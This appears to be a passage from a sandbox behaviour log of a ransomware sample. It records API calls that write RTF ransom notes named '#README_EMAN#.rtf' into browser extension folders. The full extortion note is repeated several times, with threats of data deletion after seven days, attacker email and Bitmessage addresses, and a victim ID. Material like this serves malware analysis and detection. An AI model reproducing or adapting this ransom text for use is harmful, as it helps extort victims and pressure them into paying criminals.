\\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.164] WriteFile (in: hFile=0x2e8, lpBuffer=0x1ef8bd8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef8bd8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.166] CloseHandle (hObject=0x2e8) returned 1 [0292.166] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\#readme_eman#.rtf")) returned 0xffffffff [0292.166] GetLastError () returned 0x2 [0292.166] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fil\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.167] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to 